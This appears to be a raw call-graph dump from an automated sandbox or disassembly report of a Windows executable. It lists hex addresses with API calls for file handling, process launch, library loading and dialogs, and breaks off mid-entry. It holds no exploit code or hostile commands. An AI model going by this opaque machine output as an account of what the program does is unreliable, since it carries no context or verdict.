22433 3e1c0e 22421->22433 22424 3e0b79 22424->22343 22426 3e0b81 22427 3e0b8c 22426->22427 22447 3e1c4a DeleteCriticalSection 22426->22447 22427->22343 22475 3e8ac5 22429->22475 22432 3e0b8f 8 API calls 3 library calls 22432->22348 22434 3e1c17 22433->22434 22436 3e1c40 22434->22436 22438 3e0b75 22434->22438 22448 3e1e85 22434->22448 22453 3e1c4a DeleteCriticalSection 22436->22453 22438->22424 22439 3e0ca6 22438->22439 22468 3e1d9a 22439->22468 22441 3e0cb0 22442 3e0cbb 22441->22442 22473 3e1e48 6 API calls try_get_function 22441->22473 22442->22426 22444 3e0cc9 22445 3e0cd6 22444->22445 22474 3e0cd9 6 API calls ___vcrt_FlsFree 22444->22474 22445->22426 22447->22424 22454 3e1c79 22448->22454 22451 3e1ebc InitializeCriticalSectionAndSpinCount 22452 3e1ea8 22451->22452 22452->22434 22453->22438 22455 3e1cad 22454->22455 22457 3e1ca9 22454->22457 22455->22451 22455->22452 22457->22455 22460 3e1ccd 22457->22460 22461 3e1d19 22457->22461 22458 3e1cd9 GetProcAddress 22459 3e1ce9 __crt_fast_encode_pointer 22458->22459 22459->22455 22460->22455 22460->22458 22462 3e1d36 22461->22462 22463 3e1d41 LoadLibraryExW 22461->22463 22462->22457 22464 3e1d5d GetLastError 22463->22464 22465 3e1d75 22463->22465 22464->22465 22466 3e1d68 LoadLibraryExW 22464->22466 22465->22462 22467 3e1d8c FreeLibrary 22465->22467 22466->22465 22467->22462 22469 3e1c79 try_get_function 5 API calls 22468->22469 22470 3e1db4 22469->22470 22471 3e1dcc TlsAlloc 22470->22471 22472 3e1dbd 22470->22472 22472->22441 22473->22444 22474->22442 22478 3e8ade 22475->22478 22476 3dd783 CatchGuardHandler 5 API calls 22477 3dd14d 22476->22477 22477->22345 22477->22432 22478->22476 22480 3ddba3 GetStartupInfoW 22479->22480 22480->22360 22482 3e856a 22481->22482 22483 3e8561 22481->22483 22482->22363 22486 3e8457 22483->22486 22485->22363 22487 3e631f pre_c_initialization 38 API calls 22486->22487 22488 3e8464 22487->22488 22506 3e8576 22488->22506 22490 3e846c 22515 3e81eb 22490->22515 22493 3e59fc __vswprintf_c_l 21 API calls 22494 3e8494 22493->22494 22505 3e84c6 22494->22505 22522 3e8618 22494->22522 22497 3e59c2 _free 20 API calls 22499 3e8483 22497->22499 22498 3e84c1 22532 3e5e3e 20 API calls __dosmaperr 22498->22532 22499->22482 22501 3e850a 22501->22505 22533 3e80c1 26 API calls 22501->22533 22502 3e84de 22502->22501 22503 3e59c2 _free 20 API calls 22502->22503 22503->22501 22505->22497 22507 3e8582 ___FrameUnwindToState 22506->22507 22508 3e631f pre_c_initialization 38 API calls 22507->22508 22511 3e858c 22508->22511 22510 3e8610 ___FrameUnwindToState 22510->22490 22511->22510 22514 3e59c2 _free 20 API calls 22511->22514 22534 3e5a4a 38 API calls _abort 22511->22534 22535 3e76d6 EnterCriticalSection 22511->22535 22536 3e8607 LeaveCriticalSection _abort 22511->22536 22514->22511 22516 3e2636 __fassign 38 API calls 22515->22516 22517 3e81fd 22516->22517 22518 3e821e 22517->22518 22519 3e820c GetOEMCP 22517->22519 22520 3e8235 22518->22520 22521 3e8223 GetACP 22518->22521 22519->22520 22520->22493 22520->22499 22521->22520 22523 3e81eb 40 API calls 22522->22523 22524 3e8637 22523->22524 22527 3e8688 IsValidCodePage 22524->22527 22529 3e863e 22524->22529 22531 3e86ad ___scrt_fastfail 22524->22531 22525 3dd783 CatchGuardHandler 5 API calls 22526 3e84b9 22525->22526 22526->22498 22526->22502 22528 3e869a GetCPInfo 22527->22528 22527->22529 22528->22529 22528->22531 22529->22525 22537 3e82c3 GetCPInfo 22531->22537 22532->22505 22533->22505 22535->22511 22536->22511 22538 3e83a7 22537->22538 22543 3e82fd 22537->22543 22540 3dd783 CatchGuardHandler 5 API calls 22538->22540 22542 3e8453 22540->22542 22542->22529 22547 3e93f3 22543->22547 22546 3e75cb __vswprintf_c_l 43 API calls 22546->22538 22548 3e2636 __fassign 38 API calls 22547->22548 22549 3e9413 MultiByteToWideChar 22548->22549 22551 3e9451 22549->22551 22558 3e94e9 22549->22558 22552 3e9472 __vswprintf_c_l ___scrt_fastfail 22551->22552 22554 3e59fc __vswprintf_c_l 21 API calls 22551->22554 22556 3e94e3 22552->22556 22559 3e94b7 MultiByteToWideChar 22552->22559 22553 3dd783 CatchGuardHandler 5 API calls 22555 3e835e 22553->22555 22554->22552 22561 3e75cb 22555->22561 22566 3e7616 20 API calls _free 22556->22566 22558->22553 22559->22556 22560 3e94d3 GetStringTypeW 22559->22560 22560->22556 22562 3e2636 __fassign 38 API calls 22561->22562 22563 3e75de 22562->22563 22567 3e73ae 22563->22567 22566->22558 22568 3e73c9 __vswprintf_c_l 22567->22568 22569 3e73ef MultiByteToWideChar 22568->22569 22570 3e7419 22569->22570 22581 3e75a3 22569->22581 22571 3e743a __vswprintf_c_l 22570->22571 22574 3e59fc __vswprintf_c_l 21 API calls 22570->22574 22575 3e7483 MultiByteToWideChar 22571->22575 22577 3e74ef 22571->22577 22572 3dd783 CatchGuardHandler 5 API calls 22573 3e75b6 22572->22573 22573->22546 22574->22571 22576 3e749c 22575->22576 22575->22577 22594 3e7a09 22576->22594 22603 3e7616 20 API calls _free 22577->22603 22581->22572 22582 3e74fe 22586 3e59fc __vswprintf_c_l 21 API calls 22582->22586 22589 3e751f __vswprintf_c_l 22582->22589 22583 3e74c6 22583->22577 22585 3e7a09 __vswprintf_c_l 11 API calls 22583->22585 22584 3e7594 22602 3e7616 20 API calls _free 22584->22602 22585->22577 22586->22589 22587 3e7a09 __vswprintf_c_l 11 API calls 22590 3e7573 22587->22590 22589->22584 22589->22587 22590->22584 22591 3e7582 WideCharToMultiByte 22590->22591 22591->22584 22592 3e75c2 22591->22592 22604 3e7616 20 API calls _free 22592->22604 22595 3e7735 pre_c_initialization 5 API calls 22594->22595 22596 3e7a30 22595->22596 22599 3e7a39 22596->22599 22605 3e7a91 10 API calls 3 library calls 22596->22605 22598 3e7a79 LCMapStringW 22598->22599 22600 3dd783 CatchGuardHandler 5 API calls 22599->22600 22601 3e74b3 22600->22601 22601->22577 22601->22582 22601->22583 22602->22577 22603->22581 22604->22577 22605->22598 22607 3dcec0 22606->22607 22608 3cf35d GetModuleHandleW 22607->22608 22609 3cf3c8 22608->22609 22610 3cf377 GetProcAddress 22608->22610 22611 3cf6fd GetModuleFileNameW 22609->22611 22711 3e462a 42 API calls __vswprintf_c_l 22609->22711 22612 3cf3a0 GetProcAddress 22610->22612 22613 3cf390 22610->22613 22623 3cf718 22611->22623 22612->22609 22615 3cf3ac 22612->22615 22613->22612 22615->22609 22616 3cf63b 22616->22611 22617 3cf646 GetModuleFileNameW CreateFileW 22616->22617 22618 3cf675 SetFilePointer 22617->22618 22619 3cf6f1 CloseHandle 22617->22619 22618->22619 22620 3cf685 ReadFile 22618->22620 22619->22611 22620->22619 22622 3cf6a4 22620->22622 22622->22619 22626 3cf309 2 API calls 22622->22626 22625 3cf74d CompareStringW 22623->22625 22627 3cf797 22623->22627 22628 3cf783 GetFileAttributesW 22623->22628 22702 3ca8e0 22623->22702 22705 3cf309 22623->22705 22625->22623 22626->22622 22629 3cf7a4 22627->22629 22632 3cf7d6 22627->22632 22628->22623 22628->22627 22631 3cf7bc GetFileAttributesW 22629->22631 22633 3cf7d0 22629->22633 22630 3cf8e5 22654 3d8b8e GetCurrentDirectoryW 22630->22654 22631->22629 22631->22633 22632->22630 22634 3ca8e0 GetVersionExW 22632->22634 22633->22632 22635 3cf7f0 22634->22635 22636 3cf85d 22635->22636 22637 3cf7f7 22635->22637 22639 3c3f5b _swprintf 51 API calls 22636->22639 22638 3cf309 2 API calls 22637->22638 22640 3cf801 22638->22640 22641 3cf885 AllocConsole 22639->22641 22644 3cf309 2 API calls 22640->22644 22642 3cf8dd ExitProcess 22641->22642 22643 3cf892 GetCurrentProcessId AttachConsole 22641->22643 22719 3e20b3 22643->22719 22646 3cf80b 22644->22646 22712 3cd142 22646->22712 22647 3cf8b3 GetStdHandle WriteConsoleW Sleep FreeConsole 22647->22642 22650 3c3f5b _swprintf 51 API calls 22651 3cf839 22650->22651 22652 3cd142 54 API calls 22651->22652 22653 3cf848 22652->22653 22653->22642 22654->22370 22656 3cf309 2 API calls 22655->22656 22657 3d904a OleInitialize 22656->22657 22658 3d906d GdiplusStartup SHGetMalloc 22657->22658 22658->22372 22660 3d0746 IsDBCSLeadByte 22659->22660 22660->22660 22661 3d075e 22660->22661 22661->22374 22663 3da8de 22662->22663 22664 3da9f4 22663->22664 22665 3da926 CharUpperW 22663->22665 22666 3da9a9 CharUpperW 22663->22666 22667 3da94d CharUpperW 22663->22667 22731 3cdfde 73 API calls ___scrt_fastfail 22663->22731 22664->22383 22664->22384 22665->22663 22666->22663 22667->22663 22670 3dcec0 22669->22670 22671 3dbe17 SetEnvironmentVariableW 22670->22671 22673 3dbe3a 22671->22673 22672 3dbe62 22672->22377 22673->22672 22674 3dbe56 SetEnvironmentVariableW 22673->22674 22674->22672 22676 3d9a97 22675->22676 22677 3d9aa0 GetObjectW 22675->22677 22737 3d8bd0 FindResourceW 22676->22737 22732 3d8ac0 22677->22732 22682 3d9af3 22693 3ccaa7 22682->22693 22683 3d9ad3 22753 3d8b22 GetDC GetDeviceCaps ReleaseDC 22683->22753 22684 3d8bd0 13 API calls 22686 3d9ac8 22684->22686 22686->22683 22688 3d9ace DeleteObject 22686->22688 22687 3d9adb 22754 3d8adf GetDC GetDeviceCaps ReleaseDC 22687->22754 22688->22683 22690 3d9ae4 22755 3d8cf3 8 API calls ___scrt_fastfail 22690->22755 22692 3d9aeb DeleteObject 22692->22682 22766 3ccacc 22693->22766 22697 3ccaba 22697->22393 22699 3d90c4 GdiplusShutdown CoUninitialize 22698->22699 22699->22409 22700->22400 22701->22407 22703 3ca8f4 GetVersionExW 22702->22703 22704 3ca930 22702->22704 22703->22704 22704->22623 22706 3dcec0 22705->22706 22707 3cf316 GetSystemDirectoryW 22706->22707 22708 3cf34c 22707->22708 22709 3cf32e 22707->22709 22708->22623 22710 3cf33f LoadLibraryW 22709->22710 22710->22708 22711->22616 22713 3cd172 22712->22713 22714 3cd17b LoadStringW 22713->22714 22715 3cd191 LoadStringW 22713->22715 22714->22715 22716 3cd1a3 22714->22716 22715->22716 22721 3cc91f 22716->22721 22718 3cd1b1 22718->22650 22720 3e20bb 22719->22720 22720->22647 22720->22720 22722 3cc929 22721->22722 22723 3cc99d _strlen 22722->22723 22728 3cc9fb _wcschr _wcsrchr 22722->22728 22729 3d0905 WideCharToMultiByte 22722->22729 22730 3d0905 WideCharToMultiByte 22723->22730 22726 3cc9c8 _strlen 22727 3c3f5b _swprintf 51 API calls 22726->22727 22727->22728 22728->22718 22729->22723 22730->22726 22731->22663 22756 3d8adf GetDC GetDeviceCaps ReleaseDC 22732->22756 22734 3d8ac7 22735 3d8ad3 22734->22735 22757 3d8b22 GetDC GetDeviceCaps ReleaseDC 22734->22757 22735->22682 22735->22683 22735->22684 22738 3d8c23 22737->22738 22739 3d8bf1 SizeofResource 22737->22739 22738->22677 22739->22738 22740 3d8c05 LoadResource 22739->22740 22740->22738 22741 3d8c16 LockResource 22740->22741 22741->22738 22742 3d8c2a GlobalAlloc 22741->22742 22742->22738 22743 3d8c41 GlobalLock 22742->22743 22744 3d8c4c __vswprintf_c_l 22743->22744 22745 3d8cb8 GlobalFree 22743->22745 22746 3d8c54 CreateStreamOnHGlobal 22744->22746 22745->22738 22747 3d8c6c 22746->22747 22748 3d8cb1 GlobalUnlock 22746->22748 22758 3d8b65 GdipAlloc 22747->22758 22748->22745 22751 3d8ca6 22751->22748 22752 3d8c90 GdipCreateHBITMAPFromBitmap 22752->22751 22753->22687 22754->22690 22755->22692 22756->22734 22757->22735 22759 3d8b77 22758->22759 22760 3d8b84 22758->22760 22762 3d8924 22759->22762 22760->22748 22760->22751 22760->22752 22763 3d894c GdipCreateBitmapFromStream 22762->22763 22764 3d8945 GdipCreateBitmapFromStreamICM 22762->22764 22765 3d8951 22763->22765 22764->22765 22765->22760 22767 3ccad6 _wcschr __EH_prolog 22766->22767 22768 3ccb02 GetModuleFileNameW 22767->22768 22769 3ccb33 22767->22769 22770 3ccb1c 22768->22770 22789 3c973d 22769->22789 22770->22769 22774 3ccc9f 22775 3c99e0 70 API calls 22774->22775 22784 3ccce9 22774->22784 22778 3cccb9 new 22775->22778 22779 3c990d 73 API calls 22778->22779 22778->22784 22782 3cccdf new 22779->22782 22781 3ccb63 22781->22774 22781->22784 22798 3c9aeb 22781->22798 22813 3c990d 22781->22813 22821 3c99e0 22781->22821 22782->22784 22826 3d06e9 MultiByteToWideChar 22782->22826 22806 3c9437 22784->22806 22785 3cce48 GetModuleHandleW FindResourceW 22786 3cce76 22785->22786 22788 3cce70 22785->22788 22787 3cc91f 52 API calls 22786->22787 22787->22788 22788->22697 22790 3c9747 22789->22790 22791 3c979d CreateFileW 22790->22791 22792 3c97ca GetLastError 22791->22792 22794 3c981b 22791->22794 22793 3cb275 2 API calls 22792->22793 22795 3c97ea 22793->22795 22794->22781 22795->22794 22796 3c97ee CreateFileW GetLastError 22795->22796 22797 3c9812 22796->22797 22797->22794 22799 3c9afe 22798->22799 22800 3c9b0f SetFilePointer 22798->22800 22802 3c9b48 22799->22802 22827 3c6eae 68 API calls 22799->22827 22801 3c9b2d GetLastError 22800->22801 22800->22802 22801->22802 22804 3c9b37 22801->22804 22802->22781 22804->22802 22828 3c6eae 68 API calls 22804->22828 22807 3c945b 22806->22807 22808 3c946c 22806->22808 22807->22808 22809 3c946e 22807->22809 22810 3c9467 22807->22810 22808->22785 22834 3c94a3 22809->22834 22829 3c95ea 22810->22829 22814 3c9924 22813->22814 22816 3c9977 22814->22816 22818 3c9985 22814->22818 22820 3c9987 22814->22820 22849 3c9613 22814->22849 22861 3c6e74 68 API calls 22816->22861 22818->22781 22819 3c9613 5 API calls 22819->22820 22820->22818 22820->22819 22866 3c9897 22821->22866 22824 3c9a0b 22824->22781 22826->22784 22827->22800 22828->22802 22830 3c95f7 22829->22830 22831 3c95f3 22829->22831 22830->22831 22840 3c9dac 22830->22840 22831->22808 22835 3c94af 22834->22835 22836 3c94cd 22834->22836 22835->22836 22838 3c94bb CloseHandle 22835->22838 22837 3c94ec 22836->22837 22848 3c6d80 67 API calls 22836->22848 22837->22808 22838->22836 22841 3dcec0 22840->22841 22842 3c9db9 DeleteFileW 22841->22842 22843 3c9dcc 22842->22843 22844 3c9611 22842->22844 22845 3cb275 2 API calls 22843->22845 22844->22808 22846 3c9de0 22845->22846 22846->22844 22847 3c9de4 DeleteFileW 22846->22847 22847->22844 22848->22837 22850 3c962c ReadFile 22849->22850 22851 3c9621 GetStdHandle 22849->22851 22852 3c9645 22850->22852 22857 3c9665 22850->22857 22851->22850 22862 3c971a 22852->22862 22854 3c964c 22855 3c966d GetLastError 22854->22855 22856 3c965a 22854->22856 22858 3c967c 22854->22858 22855->22857 22855->22858 22859 3c9613 GetFileType 22856->22859 22857->22814 22858->22857 22860 3c968c GetLastError 22858->22860 22859->22857 22860->22856 22860->22857 22861->22818 22863 3c9720 22862->22863 22864 3c9723 GetFileType 22862->22864 22863->22854 22865 3c9731 22864->22865 22865->22854 22869 3c9902 22866->22869 22870 3c98a3 22866->22870 22867 3c98da SetFilePointer 22868 3c98f8 GetLastError 22867->22868 22867->22869 22868->22869 22869->22824 22871 3c6eae 68 API calls 22869->22871 22870->22867 22871->22824 22873 3e494d _abort 22872->22873 22874 3e4965 22873->22874 22875 3e4a9b _abort GetModuleHandleW 22873->22875 22894 3e76d6 EnterCriticalSection 22874->22894 22877 3e4959 22875->22877 22877->22874 22906 3e4adf GetModuleHandleExW 22877->22906 22881 3e4a28 22898 3e4a5a 22881->22898 22882 3e4a54 22915 3ef149 5 API calls CatchGuardHandler 22882->22915 22886 3e56d0 _abort 5 API calls 22892 3e49fa 22886->22892 22887 3e56d0 _abort 5 API calls 22893 3e4a0b 22887->22893 22888 3e496d 22890 3e49e2 22888->22890 22888->22893 22914 3e5447 20 API calls _abort 22888->22914 22890->22886 22890->22892 22892->22887 22895 3e4a4b 22893->22895 22894->22888 22916 3e771e LeaveCriticalSection 22895->22916 22897 3e4a24 22897->22881 22897->22882 22917 3e7b13 22898->22917 22901 3e4a88 22904 3e4adf _abort 8 API calls 22901->22904 22902 3e4a68 GetPEB 22902->22901 22903 3e4a78 GetCurrentProcess TerminateProcess 22902->22903 22903->22901 22905 3e4a90 ExitProcess 22904->22905 22907 3e4b2c 22906->22907 22908 3e4b09 GetProcAddress 22906->22908 22910 3e4b3b 22907->22910 22911 3e4b32 FreeLibrary 22907->22911 22909 3e4b1e 22908->22909 22909->22907 22912 3dd783 CatchGuardHandler 5 API calls 22910->22912 22911->22910 22913 3e4b45 22912->22913 22913->22874 22914->22890 22916->22897 22918 3e7b2e 22917->22918 22919 3e7b38 22917->22919 22921 3dd783 CatchGuardHandler 5 API calls 22918->22921 22920 3e7735 pre_c_initialization 5 API calls 22919->22920 22920->22918 22922 3e4a64 22921->22922 22922->22901 22922->22902 23921 3e6f03 21 API calls 2 library calls 23896 3e0a00 6 API calls 3 library calls 23828 3dd002 38 API calls 2 library calls 23872 3e3501 QueryPerformanceFrequency QueryPerformanceCounter 23922 3ec301 21 API calls __vswprintf_c_l 23923 3dd779 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 21985 3db077 21987 3db07c 21985->21987 21995 3daa99 _wcsrchr 21985->21995 21987->21995 22011 3db9aa 21987->22011 21988 3db642 21991 3dad86 SetWindowTextW 21991->21995 21995->21988 21995->21991 22002 3daf50 GetDlgItem SetWindowTextW SendMessageW 21995->22002 22005 3daf92 SendMessageW 21995->22005 22009 3dab6a ___scrt_fastfail 21995->22009 22010 3d0b12 CompareStringW 21995->22010 22034 3d96ec 21995->22034 22038 3d8b8e GetCurrentDirectoryW 21995->22038 22039 3ca1a9 7 API calls 21995->22039 22045 3ca132 FindClose 21995->22045 22046 3d9844 69 API calls new 21995->22046 22047 3e20de 21995->22047 21997 3dab77 SetFileAttributesW 21999 3dac32 GetFileAttributesW 21997->21999 21997->22009 22001 3dac40 DeleteFileW 21999->22001 21999->22009 22001->22009 22002->21995 22005->21995 22007 3dac86 MoveFileW 22008 3dac9e MoveFileExW 22007->22008 22007->22009 22008->22009 22009->21995 22009->21997 22009->21999 22040 3cb100 52 API calls 2 library calls 22009->22040 22041 3c3f5b 22009->22041 22044 3ca1a9 7 API calls 22009->22044 22010->21995 22013 3db9b4 ___scrt_fastfail 22011->22013 22012 3dbc0c 22012->21995 22013->22012 22014 3dba9f 22013->22014 22063 3d0b12 CompareStringW 22013->22063 22060 3c9dff 22014->22060 22018 3dbad3 ShellExecuteExW 22018->22012 22025 3dbae6 22018->22025 22020 3dbacb 22020->22018 22021 3dbb21 22065 3dbe69 WaitForSingleObject PeekMessageW WaitForSingleObject 22021->22065 22022 3dbb77 CloseHandle 22023 3dbb85 22022->22023 22024 3dbb90 22022->22024 22066 3d0b12 CompareStringW 22023->22066 22024->22012 22030 3dbc07 ShowWindow 22024->22030 22025->22021 22025->22022 22027 3dbb1b ShowWindow 22025->22027 22027->22021 22029 3dbb39 22029->22022 22031 3dbb4c GetExitCodeProcess 22029->22031 22030->22012 22031->22022 22032 3dbb5f 22031->22032 22032->22022 22035 3d96f6 22034->22035 22036 3d97cc 22035->22036 22037 3d97a9 ExpandEnvironmentStringsW 22035->22037 22036->21995 22037->22036 22038->21995 22039->21995 22040->22009 22090 3c3f2e 22041->22090 22044->22009 22045->21995 22046->21995 22048 3e5aea 22047->22048 22049 3e5af7 22048->22049 22050 3e5b02 22048->22050 22170 3e59fc 22049->22170 22052 3e5b0a 22050->22052 22053 3e5b13 pre_c_initialization 22050->22053 22056 3e59c2 _free 20 API calls 22052->22056 22054 3e5b3d RtlReAllocateHeap 22053->22054 22055 3e5b18 22053->22055 22178 3e46ca 7 API calls 2 library calls 22053->22178 22054->22053 22058 3e5aff 22054->22058 22177 3e5e3e 20 API calls __dosmaperr 22055->22177 22056->22058 22058->21995 22067 3c9e13 22060->22067 22063->22014 22064 3cae20 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW CharUpperW 22064->22020 22065->22029 22066->22024 22075 3dcec0 22067->22075 22070 3c9e08 22070->22018 22070->22064 22071 3c9e31 22077 3cb275 22071->22077 22073 3c9e45 22073->22070 22074 3c9e49 GetFileAttributesW 22073->22074 22074->22070 22076 3c9e20 GetFileAttributesW 22075->22076 22076->22070 22076->22071 22078 3cb282 22077->22078 22086 3cb28c 22078->22086 22087 3cb40f CharUpperW 22078->22087 22080 3cb29b 22088 3cb43b CharUpperW 22080->22088 22082 3cb2aa 22083 3cb2ae 22082->22083 22084 3cb325 GetCurrentDirectoryW 22082->22084 22089 3cb40f CharUpperW 22083->22089 22084->22086 22086->22073 22087->22080 22088->22082 22089->22086 22091 3c3f45 __vswprintf_c_l 22090->22091 22094 3e34dd 22091->22094 22097 3e21bb 22094->22097 22098 3e21fb 22097->22098 22099 3e21e3 22097->22099 22098->22099 22101 3e2203 22098->22101 22114 3e5e3e 20 API calls __dosmaperr 22099->22114 22116 3e2636 22101->22116 22102 3e21e8 22115 3e5d1d 26 API calls ___std_exception_copy 22102->22115 22108 3e228b 22125 3e283c 51 API calls 3 library calls 22108->22125 22109 3c3f4f GetFileAttributesW 22109->22007 22109->22009 22112 3e21f3 22127 3dd783 22112->22127 22113 3e2296 22126 3e26b9 20 API calls _free 22113->22126 22114->22102 22115->22112 22117 3e2213 22116->22117 22118 3e2653 22116->22118 22124 3e2601 20 API calls 2 library calls 22117->22124 22118->22117 22134 3e631f GetLastError 22118->22134 22120 3e2674 22155 3e646e 38 API calls __fassign 22120->22155 22122 3e268d 22156 3e649b 38 API calls __fassign 22122->22156 22124->22108 22125->22113 22126->22112 22128 3dd78c 22127->22128 22129 3dd78e IsProcessorFeaturePresent 22127->22129 22128->22109 22131 3dddb8 22129->22131 22169 3ddd7c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 22131->22169 22133 3dde9b 22133->22109 22135 3e6335 22134->22135 22136 3e6341 22134->22136 22157 3e78f8 11 API calls 2 library calls 22135->22157 22158 3e5a8d 20 API calls 3 library calls 22136->22158 22139 3e634d 22142 3e6355 22139->22142 22165 3e794e 11 API calls 2 library calls 22139->22165 22140 3e633b 22140->22136 22141 3e638a SetLastError 22140->22141 22141->22120 22159 3e59c2 22142->22159 22145 3e636a 22145->22142 22147 3e6371 22145->22147 22146 3e635b 22148 3e6396 SetLastError 22146->22148 22166 3e6191 20 API calls pre_c_initialization 22147->22166 22167 3e5a4a 38 API calls _abort 22148->22167 22151 3e637c 22153 3e59c2 _free 20 API calls 22151->22153 22154 3e6383 22153->22154 22154->22141 22154->22148 22155->22122 22156->22117 22157->22140 22158->22139 22160 3e59cd RtlFreeHeap 22159->22160 22161 3e59f6 __dosmaperr 22159->22161 22160->22161 22162 3e59e2 22160->22162 22161->22146 22168 3e5e3e 20 API calls __dosmaperr 22162->22168 22164 3e59e8 GetLastError 22164->22161 22165->22145 22166->22151 22168->22164 22169->22133 22171 3e5a3a 22170->22171 22175 3e5a0a pre_c_initialization 22170->22175 22180 3e5e3e 20 API calls __dosmaperr 22171->22180 22173 3e5a25 RtlAllocateHeap 22174 3e5a38 22173->22174 22173->22175 22174->22058 22175->22171 22175->22173 22179 3e46ca 7 API calls 2 library calls 22175->22179 22177->22058 22178->22053 22179->22175 22180->22174 23924 3ed774 IsProcessorFeaturePresent 23836 3c1067 75 API calls pre_c_initialization 23874 3d8963 GdipDisposeImage GdipFree __except_handler4 23925 3e1f60 RtlUnwind 22246 3dcd5c 22247 3dcd66 22246->22247 22250 3dcabc 22247->22250 22278 3dc7ca 22250->22278 22252 3dcad6 22253 3dcb33 22252->22253 22267 3dcb57 22252->22267 22289 3dca3a 11 API calls 3 library calls 22253->22289 22255 3dcb3e RaiseException 22256 3dcd2c 22255->22256 22258 3dd783 CatchGuardHandler 5 API calls 22256->22258 22257 3dcbcf LoadLibraryExA 22259 3dcc30 22257->22259 22260 3dcbe2 GetLastError 22257->22260 22261 3dcd3b 22258->22261 22262 3dcc3b FreeLibrary 22259->22262 22266 3dcc42 22259->22266 22263 3dcc0b 22260->22263 22264 3dcbf5 22260->22264 22262->22266 22290 3dca3a 11 API calls 3 library calls 22263->22290 22264->22259 22264->22263 22265 3dcca0 GetProcAddress 22268 3dccb0 GetLastError 22265->22268 22274 3dccfe 22265->22274 22266->22265 22266->22274 22267->22257 22267->22259 22267->22266 22267->22274 22270 3dccc3 22268->22270 22270->22274 22291 3dca3a 11 API calls 3 library calls 22270->22291 22272 3dcc16 RaiseException 22272->22256 22292 3dca3a 11 API calls 3 library calls 22274->22292 22275 3dcce4 RaiseException 22276 3dc7ca ___delayLoadHelper2@8 11 API calls 22275->22276 22277 3dccfb 22276->22277 22277->22274 22279 3dc7fc 22278->22279 22280 3dc7d6 22278->22280 22279->22252 22293 3dc878 8 API calls 2 library calls 22280->22293 22282 3dc7db 22283 3dc7f7 22282->22283 22294 3dc9ca VirtualQuery GetSystemInfo VirtualProtect DloadObtainSection DloadMakePermanentImageCommit 22282->22294 22295 3dc7fd GetModuleHandleW GetProcAddress GetProcAddress 22283->22295 22286 3dd783 CatchGuardHandler 5 API calls 22287 3dcab8 22286->22287 22287->22252 22288 3dca87 22288->22286 22289->22255 22290->22272 22291->22275 22292->22256 22293->22282 22294->22283 22295->22288 23837 3c605e 73 API calls 23875 3d995f 104 API calls 23876 3d955f 71 API calls 23877 3dd553 46 API calls 6 library calls 22935 3d9b4f 22936 3d9b59 __EH_prolog 22935->22936 23095 3c12e7 22936->23095 22939 3d9b9b 22943 3d9ba8 22939->22943 22944 3d9c11 22939->22944 22968 3d9b87 22939->22968 22940 3da230 23168 3db8bc 22940->23168 22948 3d9bad 22943->22948 22949 3d9be4 22943->22949 22947 3d9cb0 GetDlgItemTextW 22944->22947 22953 3d9c2b 22944->22953 22945 3da25c 22951 3da265 SendDlgItemMessageW 22945->22951 22952 3da276 GetDlgItem SendMessageW 22945->22952 22946 3da24e SendMessageW 22946->22945 22947->22949 22950 3d9ce7 22947->22950 22958 3cd142 54 API calls 22948->22958 22948->22968 22954 3d9c05 KiUserCallbackDispatcher 22949->22954 22949->22968 22956 3d9cff GetDlgItem 22950->22956 23093 3d9cf0 22950->23093 22951->22952 23186 3d8b8e GetCurrentDirectoryW 22952->23186 22957 3cd142 54 API calls 22953->22957 22954->22968 22960 3d9d39 SetFocus 22956->22960 22961 3d9d13 SendMessageW SendMessageW 22956->22961 22962 3d9c4d SetDlgItemTextW 22957->22962 22963 3d9bc7 22958->22963 22959 3da2a8 GetDlgItem 22964 3da2c7 SetWindowTextW 22959->22964 22965 3da2c1 22959->22965 22966 3d9d49 22960->22966 22977 3d9d55 22960->22977 22961->22960 22985 3d9c5b 22962->22985 23206 3c1227 SHGetMalloc 22963->23206 23187 3d8fc8 GetClassNameW 22964->23187 22965->22964 22971 3cd142 54 API calls 22966->22971 22969 3da1d0 22973 3cd142 54 API calls 22969->22973 22996 3d9d53 22971->22996 22972 3d9bce 22972->22968 22976 3d9bd2 SetDlgItemTextW 22972->22976 22978 3da1e0 SetDlgItemTextW 22973->22978 22974 3d9c68 GetMessageW 22974->22968 22974->22985 22976->22968 22982 3cd142 54 API calls 22977->22982 22983 3da1f4 22978->22983 22986 3d9d87 22982->22986 22987 3cd142 54 API calls 22983->22987 22984 3d9daa 23113 3c9cce 22984->23113 22985->22968 22985->22974 22988 3d9c8e TranslateMessage DispatchMessageW 22985->22988 22992 3c3f5b _swprintf 51 API calls 22986->22992 22993 3da21d 22987->22993 22988->22985 22989 3da312 22991 3da342 22989->22991 22995 3cd142 54 API calls 22989->22995 22990 3daa45 91 API calls 22990->22989 23000 3daa45 91 API calls 22991->23000 23031 3da3fa 22991->23031 22992->22996 22997 3cd142 54 API calls 22993->22997 22999 3da325 SetDlgItemTextW 22995->22999 23105 3db70e GetDlgItem 22996->23105 22997->22968 23005 3cd142 54 API calls 22999->23005 23006 3da35d 23000->23006 23001 3da4aa 23007 3da4bc 23001->23007 23008 3da4b3 EnableWindow 23001->23008 23002 3d9ddf GetLastError 23003 3d9de6 23002->23003 23119 3d9023 SetCurrentDirectoryW 23003->23119 23011 3da339 SetDlgItemTextW 23005->23011 23017 3da36f 23006->23017 23032 3da394 23006->23032 23009 3da4d9 23007->23009 23215 3c12a4 GetDlgItem EnableWindow 23007->23215 23008->23007 23016 3da500 23009->23016 23023 3da4f8 SendMessageW 23009->23023 23010 3d9dfc 23014 3d9e05 GetLastError 23010->23014 23015 3d9e0f 23010->23015 23011->22991 23013 3da3ed 23019 3daa45 91 API calls 23013->23019 23014->23015 23022 3d9e8a 23015->23022 23026 3d9e9a 23015->23026 23028 3d9e27 GetTickCount 23015->23028 23016->22968 23024 3cd142 54 API calls 23016->23024 23213 3d859c 6 API calls 23017->23213 23018 3da4cf 23216 3c12a4 GetDlgItem EnableWindow 23018->23216 23019->23031 23022->23026 23027 3da0d3 23022->23027 23023->23016 23030 3da519 SetDlgItemTextW 23024->23030 23025 3da388 23025->23032 23034 3da06e 23026->23034 23035 3d9eb2 GetModuleFileNameW 23026->23035 23128 3c12c2 GetDlgItem ShowWindow 23027->23128 23036 3c3f5b _swprintf 51 API calls 23028->23036 23029 3da488 23214 3d859c 6 API calls 23029->23214 23030->22968 23031->23001 23031->23029 23038 3cd142 54 API calls 23031->23038 23032->23013 23039 3daa45 91 API calls 23032->23039 23034->22949 23047 3cd142 